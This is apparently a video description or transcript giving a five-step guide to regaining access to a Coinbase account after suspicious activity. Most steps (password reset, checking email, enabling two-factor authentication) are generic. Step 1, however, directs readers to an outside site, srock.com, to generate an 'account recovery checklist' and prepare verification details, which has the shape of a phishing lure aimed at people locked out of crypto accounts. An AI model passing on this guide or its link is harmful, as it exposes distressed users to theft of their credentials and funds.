If you've lost access to your Coinbase account due to suspicious activity, follow these steps to regain access. This guide will help you navigate the recovery process effectively. Step 1. Visit the Coinbase login page. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Click on Forgot Password. On the login page, click the Forgot Password link. This will prompt you to enter your email address again to receive a password reset link. Step 3. Check your email. Look for an email from Coinbase containing the password reset link. If you don't see it in your inbox, check your spam or junk folder. Click on the link provided in the email to reset your password. Step 4. Reset your password. Follow the instructions to create a new, strong password. Make sure it is unique and not used for any other accounts. After resetting your password, return to the login page. Step 5. Enable two-factor authentication. Once logged in, navigate to your account settings and enable two-factor authentication 2FA for added security. This will help protect your account from future unauthorized access. By following these steps, you should be able to regain access to your Coinbase account and enhance its security for the future. Always stay vigilant and monitor your account for any unusual activity.